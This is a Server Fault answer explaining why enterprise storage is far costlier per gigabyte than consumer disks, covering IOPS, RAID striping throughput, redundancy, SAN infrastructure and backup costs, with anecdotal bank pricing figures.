Some home truths about storage, or why is enterprise storage so f-ing expensive? Consumer hard drives offer large volumes of space so that even the most discerning user of *cough* streaming media *cough* can buy enough to store a collection of several terabytes. In fact, disk capacity has been growing faster than the transistor counts on silicon for a couple of decades now. 'Enterprise' storage is a somewhat more complex issue as the data has performance and integrity requirements that dictate a somewhat more heavyweight approach. The data must have some guarantee of availability in the event of hardware failures and it may have to be shared with a large number of users, which will generate many more read/write requests than a single user. The technical solutions to this problem can be many, many times more expensive per gigabyte than consumer storage solutions. They also require physical maintenance; backups must be taken and often stored off-site so that a fire does not destroy the data. This process adds ongoing costs. Performance On your 1TB consumer or even enterprise near-line drive you have just one head. The disk rotates at 7200 RPM, or 120 revolutions per second. This means that you can get at most 120 random-access I/O operations per second in theory* and somewhat less in practice. Thus, copying a large file on a single 1TB volume is relatively slow. On a disk array with 14x 72GB disks, you have 14 heads over disks going at (say) 15,000 RPM or approximately 250 revolutions per second. This gives you a theoretical maximum of 3,500 random I/O operations per second* (again, somewhat less in practice). All other things being equal a file copy will be many, many times faster. * You could get more than one random access per revolution of the disk if the geometry of the reads allowed the drive to move the heads and read a sector that happened to be available within one revolution of the disk. If the disk accesses were widely dispersed you will probably average less than one. Where a disk array formatted in a striped (see below) layout you will get a maximum of one stripe read per revolution of the disk in most circumstances and (depending on the RAID controller) possibly less than one on average. The 7200 RPM 1TB drive will probably be reasonably quick on sequential I/O. Disk arrays formatted in a striped scheme (RAID-0, RAID-5, RAID-10 etc.) can typically read at most one stripe per revolution of the disk. With a 64K stripe we can read 64Kx250 = 16MB or so of data per second off a 15,000 RPM disk. This gives a sequential throughput of around 220MB per second on an array of 14 disks, which is not that much faster on paper than the 150MB/sec or so quoted for a modern 1TB SATA disk. For video streaming (for example), an array of 4 SATA disks in a RAID-0 with a large stripe size (some RAID controllers will support stripe sizes up to 1MB) have quite a lot of sequential throughput. This example could theoretically stream about 480MB/sec, which is comfortably enough to do real-time uncompressed HD video editing. Thus, owners of Mac Pros and similar hardware can do HD video compositing tasks that would have required a machine with a direct-attach fibre array just a few years ago. The real benefit of a disk array is on database work which is characterised by large numbers of small, scattered I/O requests. On this type of workload performance is constrained by the physical latency of bits of metal in the disk going round-and-round and back-and-forth. This metric is known as IOPS (I/O operations per second). The more physical disks you have - regardless of capacity - the more IOPS you can theoretically do. More IOPS means more transactions per second. Data integrity Additionally most RAID configurations give you some data redundancy - which requires more than one physical disk by definition. The combination of a storage scheme with such redundancy and a larger number of drives gives a system the ability to reliably serve a large transactional workload. The infrastructure for disk arrays (and SANs in the more extreme case) is not exactly a mass-market item. In addition it is one of the bits that really, really cannot fail. This combination of standard of build and smaller market volumes doesn't come cheap. Total storage cost including backup In practice, the largest cost for maintaining 1TB of data is likely to be backup and recovery. A tape drive and 34 sets of SDLT or ultrium tapes for a full grandfather cycle of backup and recovery will probably cost more than a 1TB disk array did. Add the costs of off-site storage and the salary of even a single tape-monkey and suddenly your 1TB of data isn't quite so cheap. The cost of the disks is often a fair way down the hierarchy of dominant storage costs. At one bank I had occasion to work for SAN storage was costed at £900/GB for a development system and £5,000/GB for a disk on a production server. Even at enterprise vendor prices the physical cost of the disks was only a tiny fraction of that. Another example that I am aware of has a (relatively) modestly configured IBM Shark SAN that cost them somewhere in excess of £1 million. Just the physical storage on this is charged out at around £9/gigabyte, or about £9,000 for space equivalent to your 1TB consumer HDD.
{ "source": [ "https://serverfault.com/questions/2424", "https://serverfault.com", "https://serverfault.com/users/163/" ] }